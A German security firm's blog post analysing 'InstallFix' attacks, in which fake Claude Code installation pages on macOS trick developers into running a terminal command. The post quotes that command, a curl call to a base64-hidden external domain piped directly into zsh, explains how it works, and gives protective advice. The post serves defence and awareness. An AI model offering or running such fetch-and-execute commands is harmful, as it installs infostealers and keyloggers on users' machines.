Fake „Claude“-Installer: Wie InstallFix-Angriffe Keylogger und Infostealer auf macOS einschleusen

Veröffentlicht am

Fake „Claude“-Installer: Wie InstallFix-Angriffe Keylogger und Infostealer auf macOS einschleusen
BlogCybersecurity

In den letzten Wochen wurden vermehrt gefälschte Installationsseiten für das KI-Tool Claude Code beobachtet, die gezielt Entwickler und technikaffine Nutzer ins Visier nehmen. Die Seiten wirken auf den ersten Blick wie offizielle Anleitungen, enthalten aber Terminal-Befehle, die direkt Malware ausführen.

Der Vorfall: Täuschend echte Website, gefährlicher Befehl

In einem uns vorliegenden Fall wollte ein Kunde „Claude“ auf einem macOS-System installieren. Während der Recherche hatte er mehrere Tabs geöffnet, darunter vermutlich auch eine Anzeige (Ad), die auf eine täuschend echt nachgebaute Website führte.

Dort wurde der Nutzer dazu verleitet, einen vermeintlich legitimen Installationsbefehl im Terminal auszuführen:

curl -ksSLf $(echo 'aHR0cHM6Ly9zYXJhbW9mdGFoLmNvbS9jdXJsLz...'|base64 -D)|zsh

Auch andere Cybersecurity Newsportale berichten über ähnliche Vorfälle. Folgende Darstellung zeigt den Vergleich der echten und der nachgebauten Downloadseite von Claude Code. (Quelle: PushSecurity)

Fake „Claude“-Installer: Wie InstallFix-Angriffe Keylogger und Infostealer auf macOS einschleusen claude,installfix,fake claude installer

Technische Analyse: Was passiert im Hintergrund?

Der Befehl enthält eine Base64-kodierte URL. Nach der Dekodierung ergibt sich:

https://saramoftah[.]com/curl/…

Der Ablauf im Detail:

  1. Dekodierung der URL
    Der echo- und base64-Teil entschlüsselt die versteckte Zieladresse.
  2. Download der Payload
    curl lädt ein Skript von der externen Domain herunter.
  3. Direkte Ausführung
    Durch das Pipe (| zsh) wird der heruntergeladene Code sofort in der Shell ausgeführt – ohne Zwischenspeicherung oder Prüfung.

Dieses Muster ist typisch für sogenannte fileless attacks, bei denen Schadcode direkt im Arbeitsspeicher ausgeführt wird, um klassische Sicherheitsmechanismen zu umgehen.

Angriffsmethode: „InstallFix“ als neue Social-Engineering-Variante

Der Angriff passt zu einer aktuell beobachteten Technik namens InstallFix, einer Weiterentwicklung bekannter ClickFix-Ansätze.

Die Kernelemente:

  • Nutzer werden über Suchmaschinen oder Anzeigen auf Fake-Seiten gelenkt
  • Die Seiten imitieren offizielle Installationsanleitungen 1:1
  • Statt Downloads werden Terminal-Befehle bereitgestellt
  • Diese Befehle führen direkt Schadcode aus

Das Ziel: Die Hemmschwelle zu senken. Entwickler sind es gewohnt, Tools über die Kommandozeile zu installieren. Genau hier setzt der Angriff an.

Mögliche Auswirkungen

  • Infostealer (Diebstahl von Zugangsdaten, Tokens, Wallets)
  • Keylogger (Mitschnitt von Tastatureingaben)
  • Persistence-Mechanismen (dauerhafte Verankerung im System)
  • Exfiltration sensibler Daten

Gerade auf Entwickler-Systemen ist der Schaden potenziell besonders hoch, etwa durch kompromittierte SSH-Keys oder API-Tokens.

Handlungsempfehlungen

Um sich vor solchen Angriffen zu schützen, sollten folgende Maßnahmen beachtet werden:

1. Quellen kritisch prüfen

  • URLs genau kontrollieren
  • Keine Installationsanleitungen aus Ads oder unbekannten Blogs übernehmen

2. Terminal-Befehle hinterfragen

  • Besonders bei curl | sh oder curl | zsh vorsichtig sein
  • Base64-kodierte Inhalte immer zuerst entschlüsseln und prüfen

3. Sicherheitsmechanismen nutzen

  • Endpoint Protection auch auf Entwicklergeräten einsetzen
  • Netzwerkverkehr überwachen (z. B. ungewöhnliche Domains)

4. Sensibilisierung im Team

  • Awareness für Social Engineering erhöhen
  • Best Practices für Tool-Installationen definieren

Fazit

Täuschend echte Websites und scheinbar legitime Installationsschritte machen es leicht, Schadcode unbemerkt auszuführen. Besonders im Entwicklerumfeld, wo Copy & Paste zum Alltag gehört, entsteht so ein effektiver Angriffsvektor.

Mit der schnellen Verbreitung neuer Tools und KI-Plattformen steigt auch das Risiko, auf solche Kampagnen hereinzufallen. Umso wichtiger ist es, Installationsquellen kritisch zu prüfen und auch vertraut wirkende Befehle nicht ungefiltert auszuführen.

Denn am Ende gilt: Nicht jede Installation ist harmlos, und manchmal ist der schnellste Weg auch der riskanteste.

Bereits betroffen?

Wir helfen Ihnen, den Angriff zu analysieren und Schäden zu begrenzen.

Zu unserer Indicent Response

Wie wir Unternehmen helfen eine starke Cybersecurity aufzubauen.

Unsere Services für eine sichere IT

Wir bieten maßgeschneiderte Lösungen für den Schutz Ihrer IT-Systeme und unterstützen Sie mit modernster Forensik bei der Aufklärung von Sicherheitsvorfällen.

  • Beratung ansehen

    Beratung

    Sicherheit stärken. Risiken minimieren. Zertifizierungen meistern.

  • Penetrationstest ansehen

    Penetrationstest

    Mit Penetrationstests echte Angriffe simulieren, um Ihre IT-Sicherheit auf Herz und Nieren zu prüfen.

  • Cybersecurity ansehen

    Cybersecurity

    Umfassender Schutz vor Cyberbedrohungen: Erkennen, reagieren und verhindern – mit unseren maßgeschneiderten Sicherheitslösungen.

  • Forensik ansehen

    Forensik

    Forensische Datenrettung, IT-Gutachten und Incident Response – präzise, sicher und gerichtsverwertbar.

  • Digitale Tatortforensik ansehen

    Digitale Tatortforensik

    Mit 3D-Laserscanning, Bildforensik und virtuellen Rekonstruktionen Tatorte detailliert analysieren. Gerichtsverwertbare Beweise zur Aufklärung komplexer Fälle.

  • Audioforensik ansehen

    Audioforensik

    Präzise Analyse von Tonaufnahmen zur Identifikation von Sprechern, Aufdeckung von Manipulationen und Verbesserung der Verständlichkeit – für Ermittlungen, Gerichtsverfahren und technische Untersuchungen.

Sicherheitslösungen für Ihr Unternehmen

Digitale Sicherheit für Unternehmen

Cyberangriffe erkennen und abwehren

Sie haben Fragen oder benötigen Unterstützung?

Falls Sie Fragen haben oder zusätzliche Informationen benötigen, zögern Sie bitte nicht, uns zu kontaktieren.

Allgemeine Anfrage

Unser Angebot richtet sich ausschließlich an Unternehmen.